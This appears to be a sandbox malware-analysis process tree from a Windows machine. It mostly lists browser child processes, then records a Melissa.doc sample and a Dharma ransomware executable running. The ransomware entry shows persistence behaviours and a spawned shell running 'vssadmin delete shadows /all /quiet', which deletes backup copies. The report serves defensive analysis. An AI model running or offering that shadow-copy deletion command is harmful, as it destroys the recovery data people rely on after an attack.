  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffeac6946f8,0x7ffeac694708,0x7ffeac694718
  2⤵
  PID:2072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
  2⤵
  PID:208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2440 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2884 /prefetch:8
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
  2⤵
  PID:2376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
  2⤵
  PID:2400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:1788
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
  2⤵
  PID:1956
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5648 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1848
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:1
  2⤵
  PID:4836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5112 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
  2⤵
  PID:3516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6432 /prefetch:1
  2⤵
  PID:3648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3140 /prefetch:1
  2⤵
  PID:2344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:1948
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
  2⤵
  PID:5956
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6356 /prefetch:1
  2⤵
  PID:6004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
  2⤵
  PID:336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
  2⤵
  PID:5688
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4976 /prefetch:1
  2⤵
  PID:3156
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2000 /prefetch:1
  2⤵
  PID:3028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5872 /prefetch:8
  2⤵
  PID:856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6768 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2120,14709653996760914951,1039160457142929943,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3124 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5152

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3604

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4360

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5572
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe9c48cc40,0x7ffe9c48cc4c,0x7ffe9c48cc58
  2⤵
  PID:3916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1888 /prefetch:2
  2⤵
  PID:1616
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2028,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2152 /prefetch:3
  2⤵
  PID:5756
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1752,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1772 /prefetch:8
  2⤵
  PID:5832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1
  2⤵
  PID:4232
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3268,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3260 /prefetch:1
  2⤵
  PID:2772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4564,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4548 /prefetch:1
  2⤵
  PID:3632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4720 /prefetch:8
  2⤵
  PID:432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4732,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4836 /prefetch:8
  2⤵
  PID:4492
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5052,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  PID:5416
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4940,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4892 /prefetch:8
  2⤵
  PID:4044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5068,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:3748
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5164 /prefetch:8
  2⤵
  PID:4504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5076,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5368 /prefetch:8
  2⤵
  PID:5640
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5364,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:8
  2⤵
  PID:5192
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5080,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5684 /prefetch:2
  2⤵
  PID:1300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5008,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4456 /prefetch:1
  2⤵
  PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5380,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4796 /prefetch:1
  2⤵
  PID:5344
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5856,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5960 /prefetch:8
  2⤵
  PID:2204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3264,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5028 /prefetch:1
  2⤵
  PID:5916
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5984,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4992 /prefetch:1
  2⤵
  PID:3436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3380,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  PID:3176
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5268 /prefetch:8
  2⤵
  PID:624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5484,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5620 /prefetch:1
  2⤵
  PID:5044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5964,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=6060 /prefetch:1
  2⤵
  PID:5160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5320,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3500 /prefetch:1
  2⤵
  PID:5468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3368,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3344 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=240,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4460 /prefetch:1
  2⤵
  PID:5460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5152,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5124 /prefetch:1
  2⤵
  PID:2620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5132,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5784 /prefetch:8
  2⤵
  PID:3000
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=3324,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5724 /prefetch:1
  2⤵
  PID:5124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3308,i,7030952686512924165,6073522126073536878,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5136 /prefetch:8
  2⤵
  PID:5164

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:5276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3708

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4712

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Temp1_The-MALWARE-Repo-master.zip\The-MALWARE-Repo-master\Virus\Melissa.doc" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2068

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\The-MALWARE-Repo-master\The-MALWARE-Repo-master\RAT\*\" -ad -an -ai#7zMap1880:30696:7zEvent13281
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4868

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c82192ee-6cb5-4bc0-9ef0-fb818773790a} -Embedding
1⤵
PID:5452

C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe
"C:\Users\Admin\Documents\Dharma\EVER\1saas\1sass.exe"
1⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3036
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:2532
- - C:\Windows\system32\mode.com
    mode con cp select=1251
    3⤵
    PID:8480
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:11172
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
